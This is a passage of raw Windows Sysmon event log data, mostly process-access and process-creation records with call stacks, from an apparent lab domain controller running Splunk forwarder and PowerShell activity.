2\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6481-6064-5E00-00000000AE01}3304C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-6481-6064-5D00-00000000AE01}37803856C:\Windows\system32\cmd.exe{266CAFBE-6481-6064-5E00-00000000AE01}3304C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.731{266CAFBE-6481-6064-5E00-00000000AE01}3304C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-6481-6064-5D00-00000000AE01}3780C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000002597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6481-6064-5D00-00000000AE01}3780C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6481-6064-5D00-00000000AE01}3780C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-647F-6064-4E00-00000000AE01}29042688C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-6481-6064-5D00-00000000AE01}3780C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18319|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.724{266CAFBE-6481-6064-5D00-00000000AE01}3780C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.690{266CAFBE-6481-6064-5C00-00000000AE01}38482544C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.471{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6481-6064-5900-00000000AE01}4012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.471{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6481-6064-5900-00000000AE01}4012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 